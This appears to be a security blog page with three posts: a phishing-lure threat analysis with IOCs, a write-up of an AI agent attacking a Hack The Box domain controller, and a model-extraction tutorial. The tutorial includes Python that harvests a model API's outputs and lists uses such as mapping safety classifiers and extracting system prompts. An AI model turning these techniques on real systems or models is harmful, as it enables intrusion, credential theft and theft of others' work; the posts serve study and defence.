August van sickle August van sickle

How Common Email Phishing Payloads Work and Why can’t Automated Malware Analysis Sandboxes Detect Them

Dissecting the Vertex-Assets Lure: Google Search Redirects, Sandbox Evasion, and the Rise of Conditional Phishing
Threat Intelligence

A malformed .docx file, a disguised Google search URL, and a PHP-backed C2 server reveal a layered phishing operation designed to evade automated analysis while targeting investment-themed victims.

April 21, 2026 Threat Analysis IOCs Included

Executive Summary

This report documents the analysis of a suspicious file posing as a Microsoft Word document (.docx) that contained no legitimate document content. Instead, the file — a plain ASCII text file with a misleading extension — carried three identical lines embedding a malformed email address wrapped around a Google Search URL pointing to the domain vertex-assets.com. Subsequent investigation of the domain's TLS certificate, sandbox behavior, and infrastructure profile reveals a likely phishing or credential-harvesting operation employing sandbox evasion, Google redirect abuse, and conditional payload delivery — techniques that have surged dramatically across the threat landscape in 2024 and 2025.

The Initial Lure

A .docx That Isn't a .docx

The file arrived with a .docx extension, lending it the appearance of a Microsoft Word document. However, binary analysis immediately revealed the truth: the file was 197 bytes of ASCII text with CRLF line terminators. A genuine .docx is a ZIP archive containing XML — this file contained none of that structure. The misleading extension serves a dual purpose: it may bypass basic file-type filters that key on extension rather than magic bytes, and it lends unearned credibility to the contents within.

The file's entire payload consisted of three identical lines:

File Contents Email: invest@https://www.google.com/search?q=vertex-assets.com
Email: invest@https://www.google.com/search?q=vertex-assets.com
Email: invest@https://www.google.com/search?q=vertex-assets.com

The "email address" is syntactically invalid. No legitimate email system would interpret invest@https://www.google.com/search?q=vertex-assets.com as a deliverable address. The construction is designed to present the Google search URL in a context that appears informational — an investment contact — while routing the victim through Google's search infrastructure to discover and visit vertex-assets.com.

Why Google Search as a Redirector?

Embedding a malicious domain inside a Google search URL is a deliberate evasion technique. Security tools, email gateways, and even human reviewers extend implicit trust to google.com domains. A URL beginning with https://www.google.com/search will pass most reputation-based filters without scrutiny. The victim clicks through to Google, sees search results for the target domain, and clicks through organically — a multi-step redirect chain that launders the malicious destination through Google's trusted infrastructure.

This technique has been extensively documented. Cofense Intelligence tracked a significant evolution in Google redirect abuse throughout 2024, observing a transition from Google AMP-based redirects to broader Google URL redirect tactics across multiple quarters. Their Q3 2024 report noted that open redirect usage surged by 627%, while malicious Office documents — particularly .docx files embedded with phishing links — saw usage increase by nearly 600%. The combination of document-based lures with Google redirect chains is now a dominant pattern in the phishing ecosystem.

Infrastructure Analysis

TLS Certificate

Certificate transparency investigation revealed a Let's Encrypt DV certificate issued for www.new.vertex-assets.com — notably a subdomain (new.) of the domain referenced in the original lure.

FieldValue
Subject DNCN=www.new.vertex-assets.com
IssuerC=US, O=Let's Encrypt, CN=R10
ValidityNov 18, 2024 — Feb 16, 2025 (89 days)
StatusExpired — previously trusted across all major browsers
Key2048-bit RSA, e = 65,537
SignatureSHA256-RSA
SANsnew.vertex-assets.com, www.new.vertex-assets.com

The 89-day validity is standard for Let's Encrypt automated certificates — threat actors favor Let's Encrypt because it's free, automated, requires no identity verification beyond domain control, and provides browser-trusted TLS that makes malicious sites indistinguishable from legitimate ones at the transport layer. The expired status, combined with the new. subdomain, suggests infrastructure rotation: the operators likely stood up new.vertex-assets.com as a fresh front while the original domain accumulated reputation flags.

Server Profile

Active reconnaissance of the domain revealed a minimal infrastructure footprint: nginx web server on ports 80 and 443 with a PHP backend. This is a textbook profile for phishing infrastructure — lightweight, cheap to deploy, and critically important: PHP enables server-side conditional logic that can serve different content to different visitors based on headers, IP geolocation, user-agent strings, referrer data, and other fingerprinting signals.

Key Finding

The combination of nginx + PHP + Let's Encrypt certificate + investment-themed lure is a high-confidence indicator of phishing infrastructure. The PHP backend is the critical component — it enables the conditional payload delivery that explains the clean sandbox results detailed below.

Sandbox Analysis

ANY.RUN Results: A Conspicuously Clean Run

Dynamic analysis of vertex-assets.com in the ANY.RUN sandbox environment (Windows 10, Edge browser, AMD Ryzen 5 3500 VM) produced results that were notable for what they didn't show.

Dropped files: Four files, all standard Edge browser artifacts — CdmStorage.db (DRM storage), a temporary profile file, the Last Browser state file, and an EntityExtractionAssetStore.db log. No executable payloads, no scripts, no suspicious downloads.

Network activity: DNS resolution for vertex-assets.com only. All HTTP/HTTPS traffic consisted of routine Edge browser telemetry — Microsoft update checks, Bing content loads, CRL/OCSP certificate validation, Edge extension updates, and Copilot eligibility checks. Zero indicators of C2 communication, data exfiltration, or payload retrieval.

In isolation, this looks benign. In context, it's a red flag.

Why the Sandbox Saw Nothing

Modern phishing kits and exploit frameworks are purpose-built to detect and evade sandbox environments. The ANY.RUN VM carries detectable signatures — known hardware profiles, VM-associated MAC address prefixes, sandbox-specific browser configurations, and timing characteristics that differ from physical hardware. A PHP backend gives the operator full control over what gets served and to whom.

Step 1
Visitor arrives
Step 2
PHP fingerprints browser, IP, headers
Step 3
Sandbox detected?
If yes
Serve benign page
If no
Deliver payload

This conditional delivery model is well-documented across multiple phishing-as-a-service (PhaaS) platforms. The Tycoon 2FA kit, one of the most prolific AiTM phishing platforms of 2024–2025, implements this exact pattern: the C2 server analyzes browser fingerprint data to check for sandbox environments, redirecting detected sandboxes to legitimate sites like Tesla or SpaceX while serving the actual phishing payload only to validated human targets. Tycoon 2FA's April 2025 update added extensive browser fingerprinting — collecting screen parameters, console properties, timezone data, and other signals to distinguish real victims from analysis environments.

Analyst Note

The vertex-assets.com infrastructure may or may not be running Tycoon 2FA specifically. However, the behavioral profile — clean sandbox results from a PHP-backed server with investment-themed luring — is consistent with the operational playbook used by Tycoon 2FA and similar PhaaS kits. The techniques are widely commoditized and available to operators of varying sophistication.

The Broader Threat Landscape

Google Redirect Abuse at Scale

The technique observed in this sample — routing victims through Google's own infrastructure — is part of a massive and accelerating trend. Throughout 2024 and into 2025, threat actors have systematically abused Google's various services as redirect intermediaries. The attack surface extends well beyond simple search URLs: Google AMP, Google Translate, Google Maps, Google Docs, Google Cloud Storage, and google.com/url redirect endpoints have all been weaponized.

The logic is simple and effective. Secure Email Gateways and URL reputation systems give Google domains high trust scores by default. A phishing link that begins with google.com will sail through filters that would block a direct link to an unknown or flagged domain. By the time the victim clicks through to the actual malicious destination, they've already been laundered through one or more trusted intermediaries.

Integrity360's SOC published analysis in February 2026 specifically documenting the systematic abuse of multiple Google redirect mechanisms in phishing campaigns, confirming that this is not a niche technique but a mainstream operational pattern across threat actor groups of varying sophistication.

The .docx Lure Evolution

The use of a malformed .docx file as the initial delivery mechanism aligns with broader trends in document-based phishing. Cofense's 2024 data showed that malicious Office documents saw a dramatic increase in usage, with .docx files embedded with phishing links or QR codes becoming a preferred vector. The Kroll-documented "CorruptQR" campaign demonstrated an innovative variant: Office documents with deliberately corrupted header information that bypass email security solutions while relying on users to initiate a "recovery" process that triggers the malicious payload.

The sample analyzed here takes a lower-sophistication approach — a plain text file with a fake extension — but the operational concept is the same: use a document container to deliver a URL or redirect chain that would be more scrutinized if delivered as a bare link.

Conditional Payload Delivery: The New Normal

Perhaps the most significant aspect of this analysis is what the sandbox didn't find. The era of "detonate and detect" — submitting samples to sandboxes and relying on observable malicious behavior — is increasingly challenged by conditional delivery systems that detect and evade analysis environments.

Common Evasion Techniques in Current PhaaS Kits

Browser fingerprinting — screen dimensions, installed plugins, timezone, language settings, canvas fingerprint, WebGL renderer strings. Sandbox VMs typically have default or inconsistent values.

Automation detection — checking for Selenium, WebDriver, PhantomJS, Burp Suite, and other analysis tool signatures in the browser environment.

Geofencing — restricting payload delivery to specific geographic regions, blocking known VPN and proxy IP ranges, and requiring residential IP addresses.

Referrer validation — only serving the payload when the visitor arrives from a specific referrer (e.g., a Google search result), blocking direct navigation.

Timing analysis — measuring interaction timing and behavioral patterns to distinguish human browsing from automated crawling.

DOM vanishing — executing malicious JavaScript that removes itself from the DOM after execution, leaving no trace for post-hoc page inspection.

Tycoon 2FA's March 2026 takedown by Cloudflare and Microsoft — a massive multi-partner operation targeting the kit's infrastructure — underscores how significant this threat has become. Sandbox analysis confirmed that when anti-analysis measures were passed, the final payload was typically a Microsoft 365 or Gmail credential harvesting page that fingerprinted the victim's browser and geolocation, captured credentials, encrypted the data with AES, and exfiltrated it to a remote C2 server. The stolen credentials were frequently used to facilitate Business Email Compromise (BEC) attacks.

The Investment Scam Angle

The "invest@" prefix in the lure's email address suggests this campaign specifically targets individuals interested in investment opportunities. Investment-themed phishing sits at the intersection of credential theft and financial fraud — victims who navigate to the site may encounter fake trading platforms, fraudulent portfolio dashboards, or credential harvesting pages mimicking legitimate financial services. The investment vertical is particularly attractive to threat actors because victims are pre-selected for financial engagement and are often willing to provide sensitive personal and financial information.

Indicators of Compromise

Domains vertex-assets.com
new.vertex-assets.com
www.new.vertex-assets.com
Infrastructure Profile Web server: nginx
Backend: PHP
Ports: 80, 443
TLS: Let's Encrypt (expired)
TLS Certificate — SPKI SHA-256 55438fd1fd972bc5a8b3a6530e982ad64f661e43ed905b08222d2970a5b84e31
TLS Certificate — Serial Number 0x041b2bc8c7568b15dfae5f97de456fce5752
TLS Certificate — Authority Key ID bbbcc347a5e4bca9c6c3a4720c108da235e1c8e8
Lure File Characteristics Extension: .docx (misleading — actual type is ASCII text)
Size: 197 bytes
Line terminators: CRLF
Content: 3x repeated Google search redirect URL

Recommendations

For Defenders

Block the IOCs — Add the identified domains and certificate fingerprints to blocklists and threat intelligence platforms.

Don't trust clean sandbox results implicitly — A clean detonation does not equal a clean site. Consider re-running analysis with residential proxies, spoofed referrers (particularly Google search referrers), and non-default browser configurations.

Filter Google redirect chains — Implement URL inspection policies that examine the destination parameter within Google redirect URLs, not just the top-level domain.

Validate file types by content, not extension — Email gateways and endpoint protection should use magic byte / MIME type detection rather than relying on file extensions.

Monitor CT logs — Set up certificate transparency monitoring for domains of interest. New certificates issued for variants of known-malicious domains (like the new. subdomain observed here) can provide early warning of infrastructure rotation.

User awareness — Train users to recognize that a Google search URL in an email or document is not inherently trustworthy, and that legitimate investment firms do not distribute contact information in this format.

Conclusion

The vertex-assets sample is individually unsophisticated — a text file with a fake extension isn't going to win any awards for technical innovation. But that's precisely the point. The sophistication in this operation lives in the layers: a trusted Google redirect to launder the URL, a PHP backend to conditionally serve payloads, sandbox evasion to defeat automated analysis, and an investment theme to pre-qualify high-value victims. Each layer is simple; the combination is effective.

This is the direction the phishing ecosystem is heading. The commoditization of PhaaS platforms like Tycoon 2FA means that even relatively unsophisticated operators can deploy multi-layered campaigns with built-in evasion. The old model of "scan the attachment, detonate the URL, block the IOC" is no longer sufficient when the infrastructure itself decides whether to show its hand. Defenders need to think in terms of behavioral patterns and infrastructure fingerprints — not just static indicators — to keep pace with this evolution.

This analysis was conducted using open-source intelligence, certificate transparency data, and public sandbox results. IOCs are provided for defensive purposes. All analysis reflects conditions observed at the time of investigation.

Read More
August van sickle August van sickle

I Let an AI Agent Hack a Windows Domain Controller for 72 Steps and 3 hours

I've been running agentic red team frameworks against HTB lab environments to stress-test how well autonomous AI performs at offensive security. Full, unsupervised penetration tests against real infrastructure with real attack surfaces; I want to know the current reality so I can speak more accurately on the subject.

This time I pointed RedAmon, powered by Claude Opus 4.6 at a Medium-difficulty Windows machine on Hack The Box and told it to go from zero to domain compromise. No hand-holding. No hints. Just a target IP and a methodology checklist.

I ran it for 72 steps over probably a combined 3+ hours and still haven’t got the first flag but lets take a look at the context.

The Setup

The target was a Windows Server 2022 domain controller running an Active Directory domain called overwatch.htb. Standard HTB fare: find credentials, get a foothold, escalate to Domain Admin, grab both flags.

I gave RedAmon a structured methodology prompt covering recon, enumeration, exploitation, and post-exploitation. The framework has access to a Kali Linux container with Impacket, Nmap, and the usual toolkit. It can run shell commands, execute tools, and reason about output between steps.

Recon seems to be the agents true strength at this point, that was rated as an A grade.

The agent's opening move was clean. It ran a full TCP port scan with service detection in parallel with a graph database query for prior intelligence on the target. Within two minutes it had a complete picture: DNS, Kerberos, LDAP, SMB, WinRM, RDP, MSSQL on a non-standard port (6520), and AD Web Services. It correctly identified SMB signing as required, immediately ruling out relay attacks. It noted the non-standard MSSQL port as potentially indicating a custom configuration worth investigating.

The credential discovery was another highlight.

During SMB enumeration, it found a readable share called software$ containing a custom .NET monitoring application: overwatch.exe, its config file, and a PDB (debug symbols). The agent immediately recognized that .NET config files commonly contain database connection strings and prioritized downloading them.

The config file ended up being a dead end but then RedAmon pivoted to analyzing the binary.

It ran strings on the binary. Found a reference to connectionString but no plaintext value, continue to test. It then wrote a custom Python script to extract UTF-16LE encoded strings from the .NET assembly — because it understood that .NET compiles string literals as UTF-16, not ASCII.

RedAmon discovered credentials here:

Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=TI0LKcfHzZw1Vv

That's not a trivial finding. The agent reasoned about .NET internals, wrote custom extraction code, and pulled hardcoded credentials from a compiled binary. I've watched human pentesters miss this exact scenario.

The AD Enumeration Was Thorough

With valid domain credentials in hand, the agent ran authenticated LDAP queries and mapped the entire domain. It identified Adam.Russell as a Domain Admin, discovered that sqlmgmt was in the Remote Management Users group (meaning WinRM access), confirmed no Kerberoastable or AS-REP roastable accounts existed, and noted that 100+ employee accounts had the PASSWD_NOTREQD flag set.

Good situational awareness. The agent correctly identified the two paths forward: find sqlmgmt's password for WinRM, or find an MSSQL escalation path to command execution.

Where It All Fell Apart

The Premature Obituary

When the agent connected to MSSQL and saw that sqlsvc was not a sysadmin — just guest@master — it declared MSSQL a "dead end."

Here's the problem: the mssqlclient.py prompt literally said dbo@overwatch every time it switched to the overwatch database. The agent was staring at database owner privileges and dismissing the entire service because it couldn't enable xp_cmdshell.

This is the single most consequential mistake of the session. A human pentester who sees DBO on a database immediately starts testing what they can create: triggers, procedures, assemblies, jobs. The agent treated "not sysadmin" as synonymous with "nothing useful here" and walked away for thirty-five steps.

The Wilderness

What followed was the session's low point. With MSSQL "ruled out," the agent entered a sprawl of low-probability attacks:

  • Password sprayed the known credential against every high-value account. Failed.

  • Tried empty passwords against all PASSWD_NOTREQD accounts. Failed.

  • Sprayed username-as-password against thirty accounts. Failed.

  • Tried a dozen common passwords against sqlmgmt specifically. Failed.

  • Attempted to reach a WCF service on port 8000 with SOAP, WSDL, and MEX requests. Unreachable.

  • Tried to capture an NTLM hash via xp_dirtree pointing to a Responder listener. Failed because the Kali container couldn't route back from the target.

  • Checked unattend.xml in C:\Windows\Panther. Not present.

  • Looked for GPP cpassword in SYSVOL. No Preferences directory.

  • Searched Edge browser saved passwords through MSSQL file reads. Empty.

  • Attempted xp_regread for autologon credentials. Blocked.

  • Enumerated user profile directories for PowerShell history, SSH keys, documents. All empty.

That's roughly thirty steps — 40% of the entire session — producing zero forward progress. Each individual check is defensible. A thorough pentester should check unattend.xml and GPP passwords, but it shouldnt take as long as it did here.


Death by a Thousand Missing Tools

The Kali container was missing a significant chunk of the standard offensive toolkit: evil-winrm, crackmapexec, nxc, kerbrute, ldapsearch, bloodhound-python. The agent discovered each absence individually, spread across a dozen different steps, and had to write workarounds for each one.

A human would run a single tool check at the start of the engagement: which evil-winrm crackmapexec nxc kerbrute ldapsearch. The agent never did this. It just kept running into walls and adapting on the fly, burning context window and step count each time.

It also struggled repeatedly with mssqlclient.py input handling — heredocs, GO statements being interpreted as stored procedure calls, piped input formatting. It took five attempts across multiple steps to settle on the echo > file && mssqlclient.py < file pattern. That's five steps of pure yak-shaving.

The Right Answer, Forty Steps Too Late

Around step 65, the agent finally circled back to MSSQL and started exploring what DBO actually means. It discovered:

  1. It could create triggers on the EventLog table.

  2. The overwatch.exe application INSERTs into that table using string concatenation (no parameterization).

  3. The application has a KillProcess method that passes a process name directly into Stop-Process -Name {name} -Force without sanitization.

  4. Microsoft.SqlServer.Types was loaded with UNSAFE_ACCESS.

The attack chain was right there: create an AFTER INSERT trigger on EventLog that fires when overwatch.exe writes a new entry, and use it to execute code in the database context — potentially escalating through the trigger to reach the service account running the application.

The agent verified trigger creation worked. It downloaded the config file from the correct path. It enumerated assemblies and procedures.

And then the session ended at step 76. Still no flags.

The Verdict

I'm grading this session a D+. Strong recon, excellent credential discovery, with zero exploitation. It has access to the MSSQL Server but has been unable to escape that context onto the host where the sql server lives nor a linked machine and it hasn’t found ntlm credentials that can be used to get a real foothold yet.

The gap between "identifying an attack path" and "operationalizing it" is the entire story. The agent understood the overwatch.exe application logic by step 35. It knew about the SQL injection in the INSERT statement, the unsanitized PowerShell execution, and the DBO role. It just didn't act on that understanding until step 70, and by then it was out of runway.

What This Tells Us About Agentic Pentesting

Enumeration has been improved. Exploitation is not. The recon and enumeration phases of this session were genuinely good — parallel task execution, structured methodology, solid analytical reasoning. If you need an agent to map an attack surface, current models can do it. But converting findings into working exploits requires a kind of focused, iterative problem-solving that the agent struggled with.

Premature dead-end declarations are the killer. The agent's biggest failure was dismissing MSSQL based on incomplete analysis. In a human engagement, you'd have a senior operator saying "wait, you're DBO — go back and check what you can create." The agent has no such feedback loop. Once it labels something a dead end, it takes dozens of steps of failed alternatives before reconsidering.

Context switching is expensive. The agent bounced between MSSQL exploitation, password spraying, WCF service probing, file system credential hunting, NTLM capture, and GPP enumeration. Each context switch costs steps: re-establishing the MSSQL connection, reformulating queries, adjusting to different tool syntax. A human pentester works a single thread to conclusion before pivoting. The agent's "try everything in parallel" instinct, which served it well during recon, became a liability during exploitation.

Constrained environments break assumptions. The missing tools, the container networking that blocked NTLM relay, the non-standard port — each of these is a small friction that compounds. The agent adapted to each one individually but never stepped back to assess the cumulative impact on its strategy.

The "last mile" problem is real. This agent did 90% of the intellectual work. It found the credentials. It understood the application. It identified the vulnerability. It verified it could create triggers. It just couldn't chain it all together into a working exploit in the time it had left. That last 10% is where the hard problems live.

Looking Forward

I'm going to keep running these tests. The goal isn't to prove that AI can or can't hack things — it's to understand where the failure modes are so we can build better guardrails, better detection, and better benchmarks.

If you're building agentic security tools, the takeaway is this: your agent's enumeration capability is probably ahead of its exploitation capability. That's fine for asset discovery and vulnerability scanning. It's not fine if you're expecting autonomous compromise.

Read More
August van sickle August van sickle

Black-Box Model Extraction — Stealing AI Without Touching the Weights

Introduction

Today we are going to discuss the “Model Extraction” TTP, which has some new and very real impact on the industry as of today.

On March 31, 2026, security researcher Chaofan Shou posted on X: "Claude code source code has been leaked via a map file in their npm registry."

Within hours, Anthropic's entire Claude Code codebase — 512,000 lines of TypeScript across 1,900 files, including multi-agent orchestration systems, unreleased feature pipelines, internal model codenames, and architectural decisions that took years to develop — was mirrored across GitHub and analyzed by thousands of developers. The repository surpassed 1,100 stars and 1,900 forks before Anthropic could respond.

The attack vector wasn't sophisticated. It was a .map file.

When you bundle JavaScript/TypeScript for production, source map files are generated as debugging artifacts — they map compiled output back to original source. Anthropic's build pipeline, using Bun as the runtime, generated source maps by default and accidentally included a 59.8MB .map file in version 2.1.88 of the @anthropic-ai/claude-code npm package. Anyone who ran npm install @anthropic-ai/claude-code could download the complete source.

This is ML05, model and IP theft. This wasnt executed through clever API queries or gradient attacks, but through a misconfigured .npmignore. It's the third time Anthropic has made this exact mistake. Earlier versions v0.2.8 and v0.2.28 from 2025 had the same issue.

Model theft doesn't always look like a sophisticated adversarial attack. Sometimes it looks like a build pipeline oversight that costs you your roadmap.

The Threat Landscape: Real-World IP Theft Incidents

Before getting into extraction methodology, it's worth cataloging how AI IP theft actually happens in practice — because the attack surface is much broader than most might think.

Incident 1: The Claude Code Source Map Leak (March 31, 2026)

What was exposed goes beyond embarrassment. The leaked code revealed:

  • Internal model codenames: Capybara (Claude 4.6 variant), Fennec (Opus 4.6), Numbat (unreleased). For competitors, this is an intelligence windfall, you now know Anthropic's model naming conventions, what's in testing, and specific weaknesses (a 29-30% false claims rate in Capybara v8, a regression from v4's 16.7%).

  • "Undercover Mode": A subsystem designed to prevent internal information from leaking in git commits. Anthropic built a whole feature to stop their AI from revealing internal codenames; then shipped the codenames in a .map file.

  • Unreleased product pipeline: BUDDY (companion agent), KAIROS (always-on Claude), ULTRAPLAN (30-minute remote planning), and multi-agent "swarms" coordinator mode; all feature-gated in external builds but fully present in source maps.

  • Architectural decisions worth years of R&D: The query engine (46K lines), the tool system (29K lines of base tool definitions alone), the IDE bridge using JWT-authenticated channels, the persistent memory system design.

  • Security vulnerability amplification: Because the leak revealed the exact orchestration logic for Hooks and MCP servers, attackers can now design malicious repositories specifically crafted to abuse Claude Code's trust model before a user ever sees a trust prompt.

Anthropic's statement: "Earlier today, a Claude Code release included some internal source code. No sensitive customer data or credentials were involved or exposed. This was a release packaging issue caused by human error, not a security breach."

The concurrent timing is worth noting: the same day as the source map leak, the axios npm package was hit by a supply chain attack (versions 1.14.1 and 0.30.4 contained a Remote Access Trojan). If you installed or updated Claude Code between 00:21 and 03:29 UTC on March 31, 2026, audit your lockfiles immediately.

Incident 2: Meta's LLaMA Weight Leak (March 2023)

Meta released LLaMA under controlled academic access to select researchers. Within seven days, a complete copy of the model weights appeared on 4chan and spread across GitHub and BitTorrent networks. The attack vector: a single authorized researcher shared the weights publicly, bypassing the noncommercial license entirely.

Within weeks, dozens of fine-tuned variants appeared, BasedGPT and others optimized for tasks Meta never intended. IP that Meta tried to control became commodity software. Meta filed DMCA takedowns; copies continued spreading. The traditional IP enforcement model assumes centralized control. AI model weights don't fit that model.

Incident 3: Clearview AI's Facial Recognition Model (2021)

Clearview AI's facial recognition system; trained on billions of scraped images and representing years of development was stolen by attackers who gained database access. Unlike the LLaMA case, this was a direct infrastructure breach, not an insider leak. The stolen model had been trained on data Clearview itself had questionably obtained, which added a second layer of legal complexity to the breach. The model theft compounded an already-contested IP position.

Incident 4: The OpenAI Distillation Concern (2025)

In July 2025, OpenAI reportedly introduced significantly stricter internal security controls including aggressive compartmentalization, biometric access to sensitive labs, deny-by-default networking, and partially air-gapped infrastructure specifically in response to concerns about rivals using model distillation techniques on ChatGPT outputs. In other words: using the public API to systematically extract model behaviors and use them to train competing models.

OpenAI has not publicly confirmed a specific breach, but the security response is itself evidence of the threat model. The concern wasn't a single sophisticated heist, it was systematic API querying by well-resourced actors using query-based extraction at scale.

Why Query-Based Model Extraction Works

Setting aside the leak and insider threat scenarios above, the core technical attack is worth understanding deeply: extracting a functional approximation of a model purely through API queries.

ML models are function approximators. They map inputs to outputs. If you observe enough (input, output) pairs, you can train another model to approximate the same function; without access to architecture, weights, or training data.

Three properties make this practical:

Determinism. Given the same input, a deployed model produces the same (or statistically similar) output. Systematic querying is reliable.

Learnable decision boundaries. You don't need to know how the model decides you need enough samples of what it decides to train a substitute that makes the same decisions.

Rich API outputs. Most production APIs return more than just the predicted class. Confidence scores, probability distributions, ranked outputs, or generated text — all dramatically increase the information content per query. The Carlini et al. (2024) paper "Stealing Part of a Production Language Model" demonstrated extracting structural properties of production LLMs purely from their outputs at scale.

Attack Methodology

Phase 1: Reconnaissance

Understand what you're attacking before querying:

  • What inputs does the model accept? (text, images, structured data, code)

  • What does the output look like? (single class, probability distribution, generated text)

  • Are there rate limits? (defines your query budget and timing strategy)

  • Is there anomaly detection? (affects query diversity requirements)

  • Is the base model known? (if you can identify the architecture, you can initialize your substitute from the same base)

For the Claude Code case: the leaked source now tells you exactly what queries are processed, how they're tokenized, and what model variants serve which requests. Post-leak, a competitor's extraction attack would be dramatically more efficient.

Phase 2: Seed Dataset Construction

Build a query set that spans the input space. For a text classifier:

import requests
import time
from typing import List, Dict

TARGET_API = "https://api.target-model.com/classify"

def generate_seed_queries(domain: str = "text_classification", n: int = 1000) -> List[str]:
    """
    Generate queries that span the input space.
    Goal: coverage across all input types, not just obvious cases.
    """
    seeds = []
    
    # For a spam classifier: cover all realistic message types
    templates = [
        "Professional email templates",
        "Marketing messages", 
        "Meeting requests",
        "Financial notices",
        "Social messages",
        "Technical documentation",
        "Customer support tickets",
        # Edge cases near decision boundary are most valuable
        "Ambiguous promotional content",
        "Legitimate win notifications",
    ]
    
    for template_type in templates:
        queries = generate_diverse_samples(template_type, n // len(templates))
        seeds.extend(queries)
    
    return seeds

def harvest_oracle_responses(queries: List[str]) -> List[Dict]:
    """Harvest (input, output) pairs from the target oracle."""
    harvest = []
    
    for i, query in enumerate(queries):
        response = requests.post(TARGET_API, json={"text": query})
        result = response.json()
        
        harvest.append({
            "input": query,
            "output": result["predicted_class"],
            "probabilities": result.get("probabilities"),  # Gold if available
            "confidence": result.get("confidence"),
        })
        
        # Stay under rate limits — vary timing
        time.sleep(0.1 + (0.05 * (i % 3)))
    
    return harvest

Phase 3: Adaptive Boundary Exploration

Random sampling is inefficient. Samples near the decision boundary — where the model is uncertain — carry the most information about where that boundary lies. Map it precisely.

def find_boundary_samples(harvest: List[Dict], threshold: float = 0.15) -> List[Dict]:
    """
    Identify samples near the decision boundary (high uncertainty).
    These are the most informative samples for training a substitute.
    """
    boundary_samples = []
    
    for sample in harvest:
        if sample.get("probabilities"):
            # Near-50/50 split = near decision boundary
            probs = list(sample["probabilities"].values())
            uncertainty = 1 - max(probs)
            
            if uncertainty > (0.5 - threshold):
                boundary_samples.append(sample)
    
    return boundary_samples

def adaptive_boundary_exploration(
    boundary_sample: Dict,
    perturbation_fn,
    target_api,
    n_perturbations: int = 20
) -> List[Dict]:
    """
    Given a near-boundary sample, generate perturbations to map
    the local decision boundary precisely.
    """
    perturbations = perturbation_fn(boundary_sample["input"], n_perturbations)
    results = []
    
    for perturbed in perturbations:
        response = target_api.classify(perturbed)
        results.append({
            "input": perturbed,
            "output": response.predicted_class,
            "probabilities": response.probabilities,
            "is_boundary": abs(response.probabilities[0] - 0.5) < 0.1,
        })
    
    return results

Phase 4: Substitute Model Training

Train a substitute on harvested oracle labels. The substitute doesn't need to share the original's architecture, it needs to approximate its behavior.

from sklearn.naive_bayes import MultinomialNB
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics import accuracy_score
import numpy as np
import json

def train_substitute_model(harvested_data: List[Dict]):
    """
   
    """
    texts = [h["input"] for h in harvested_data]
    
    # Use oracle's probability outputs as soft labels if available
    if harvested_data[0].get("probabilities"):
        soft_labels = np.array([
            list(h["probabilities"].values()) for h in harvested_data
        ])
        y = np.argmax(soft_labels, axis=1)
    else:
        y = np.array([
            1 if h["output"] == "spam" else 0 for h in harvested_data
        ])
    
    vectorizer = TfidfVectorizer(max_features=10000, ngram_range=(1, 2))
    X = vectorizer.fit_transform(texts)
    
    substitute = MultinomialNB(alpha=0.1)
    substitute.fit(X, y)
    
    return substitute, vectorizer

def evaluate_fidelity(
    substitute, vectorizer, 
    test_queries: List[str], 
    target_api
) -> Dict:
    """
    Fidelity: what fraction of the time does the substitute
    agree with the oracle on unseen inputs?
    
    This is more meaningful than accuracy — we care about
    behavioral equivalence, not ground-truth accuracy.
    """
    agreements = 0
    total = len(test_queries)
    
    for query in test_queries:
        oracle_class = target_api.classify(query).predicted_class
        
        X = vectorizer.transform([query])
        sub_class = "spam" if substitute.predict(X)[0] == 1 else "ham"
        
        if oracle_class == sub_class:
            agreements += 1
    
    return {
        "fidelity": agreements / total,
        "n_test_queries": total,
        "interpretation": "behavioral agreement with oracle on unseen inputs"
    }

Phase 5: Operational Use

A working substitute model enables:

  • Rate limit evasion: Query your local substitute freely. Hit the production API only for ground-truth validation on edge cases.

  • Adversarial example generation: Generate adversarial inputs against the substitute. Due to transferability, they often fool the original.

  • IP theft / competing service: Offer the same capability at zero training cost.

  • Safety bypass research: Map the safety classifier's decision boundary locally. Understand exactly what inputs the model classifies as unsafe and stay below that threshold.

  • Pre-exploitation reconnaissance: Use the substitute to understand the model's behavior before crafting targeted attacks against the production system.

The LLM Extraction Problem — And What the Claude Code Leak Changes

Extracting a traditional classifier via API queries is tractable. Fully extracting a frontier LLM is a different problem in scale — but not necessarily in kind.

For LLMs, the practical extraction goals are:

System prompt extraction: Covered in depth in the prompt injection series. The leaked Claude Code source now reveals exactly how system prompts are structured, what variables they contain, and how they're constructed programmatically.

Behavioral fingerprinting: Harvesting enough output pairs to understand the model's distribution — useful for crafting effective adversarial prompts and jailbreaks.

Capability cloning via distillation: Training a smaller model on outputs from a larger one. This is specifically what OpenAI tightened infrastructure against in 2025. The research term is "model distillation" — using a large model as a teacher to train a smaller student. Done without authorization, it's IP theft via query.

Fine-tuning data extraction: Using membership inference and careful prompting to extract examples from the model's fine-tuning dataset. Particularly relevant for models fine-tuned on proprietary corpora.

The Claude Code leak specifically changes the threat model for the last two. Before the leak, an attacker trying to extract Claude Code's agentic behavior had only black-box access, they had to infer the orchestration model from behavior alone. Post-leak, the exact system prompts used by the coordinator mode, the tool permission architecture, and the query engine design are all available as a blueprint. A well-resourced actor could use the leaked source to dramatically reduce the query cost of behavioral cloning.

The Taxonomy of AI IP Theft

Pulling together the real-world cases and the technical attack, the full taxonomy:

The build pipeline exposure is the category that keeps happening and gets underweighted in threat models. Source maps, exposed .git directories, misconfigured cloud storage buckets, accidentally committed secrets; these may not be sophisticated attacks, but being sophisticated to the point of being sophisticated just because doesnt get the same amount of impact. The impact here is potentically big. The Claude Code incident being the third time Anthropic made this specific mistake is the most instructive detail in this entire story.

The Concurrent Supply Chain Attack

The axios supply chain attack occurred hours before the Claude Code source leak was disclosed.

Axios versions 1.14.1 and 0.30.4 contained a Remote Access Trojan via a dependency called plain-crypto-js. Anyone who ran npm install or npm update between 00:21 and 03:29 UTC on March 31 may have installed a compromised version.

If you installed or updated Claude Code on March 31, 2026:

grep -A2 "\"axios\"" package-lock.json
grep -A2 "axios:" yarn.lock


grep "plain-crypto-js" package-lock.json yarn.lock bun.lockb

# If found — treat the host as compromised:
# 1. Rotate all secrets and API keys accessible from that machine
# 2. Revoke any tokens that were live during the window
# 3. Full OS reinstallation before trusting the machine again

Two supply chain attacks in the same day, one targeting the same package ecosystem. This is not coincidence — this is what the attack surface looks like when a high-value developer tool with broad access to codebases and credentials becomes a target.

Detection and Defense

For defenders: what extraction attacks look like in API logs:

  • High query volume from single source or small source set

  • Systematically diverse queries (no contextual continuity between them)

